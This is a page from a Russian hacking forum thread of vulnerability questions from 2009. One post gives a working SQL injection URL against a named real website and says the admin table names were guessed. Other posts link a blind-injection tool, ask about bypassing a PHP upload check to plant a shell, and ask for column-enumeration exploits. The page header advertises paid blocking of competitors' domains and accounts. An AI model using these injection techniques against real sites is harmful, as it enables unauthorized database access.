Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1066 из 2438

1066

Опции темы

Поиск в этой теме

Опции просмотра

#10651

08.12.2009, 22:04

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

С нами: 10585560

Репутация: 1550

Отправить сообщение для Gorev с помощью Yahoo

http://podium.md/news_show.php?id=33+AND+1=(SELECT+1+FROM+admin+LIM IT+0,1)--

методом тыка угадал таблы
admin,news,user

#10652

08.12.2009, 22:12

Rubaka

Участник форума

Регистрация: 02.09.2007

Сообщений: 292

С нами: 9837719

Репутация: 466

попробуй эту софтиу для слепых иньекций www.darkc0de.com/others/blindext.py

тама дето и хелп к ней лежал

#10653

08.12.2009, 22:22

Nightmarе

Познавший АНТИЧАТ

Регистрация: 29.04.2007

Сообщений: 1,189

С нами: 10018169

Репутация: 1680

Код:

$filename   =  $_FILES['userfile']['name'];
if ($filename == 'ass.gif')
{
copy($_FILES['userfile']['tmp_name'], $uploadfile);
}

Уязвим ли этот кусок кода? К заливке шелла(файла) с расширением php

я считаю что нет... а пёс его знает, лучше спрошу у знатоков.

#10654

08.12.2009, 23:08

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

С нами: 9649706

Репутация: 3338

маловато кода выложил, где $uploadfile и форма загрузки - непонятно

#10655

08.12.2009, 23:23

Nightmarе

Познавший АНТИЧАТ

Регистрация: 29.04.2007

Сообщений: 1,189

С нами: 10018169

Репутация: 1680

Цитата:

Сообщение от Pashkela

маловато кода выложил, где $uploadfile и форма загрузки - непонятно

Код полный.

$uploadfile может быть что угодно. как
$uploadfile = 'file.lol';
так и $uploadfile = $filename;

не в нём смысл.

#10656

09.12.2009, 06:09

jangle

Познающий

Регистрация: 19.11.2006

Сообщений: 32

С нами: 10249722

Репутация: 5

Подскажите пожалуйста, можно ли как то обойти следующее в SQL

Select a from DB-nomer1.user - примерный запрос

Проблема в экранировании тере "-" и в итоге получаю ошибку

Какие есть возможности?

Последний раз редактировалось jangle; 09.12.2009 в 06:14..

#10657

09.12.2009, 06:24

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

С нами: 9154406

Репутация: 2221

Цитата:

Сообщение от Nightmarе

Код:

$filename   =  $_FILES['userfile']['name'];
if ($filename == 'ass.gif')
{
copy($_FILES['userfile']['tmp_name'], $uploadfile);
}

Нет.

#10658

09.12.2009, 06:55

Ded MustD!e

Members of Antichat - Level 5

Регистрация: 23.08.2007

Сообщений: 417

С нами: 9851426

Репутация: 3908

Цитата:

Сообщение от jangle

взять имя БД в обратные кавычки `DB-nomer1`.user, если они не фильтруются, то должно сработать.

__________________
Feci, quod potui. Faciant meliora potentes.

#10659

09.12.2009, 07:21

jangle

Познающий

Регистрация: 19.11.2006

Сообщений: 32

С нами: 10249722

Репутация: 5

2 Ded MustD!e - Thx, помогло!!!

#10660

09.12.2009, 07:28

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

С нами: 8797559

Репутация: -16

извините за вопрос ест какой то софт или ехплоит для знать сколько columns

Страница 1066 из 2438

1066

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход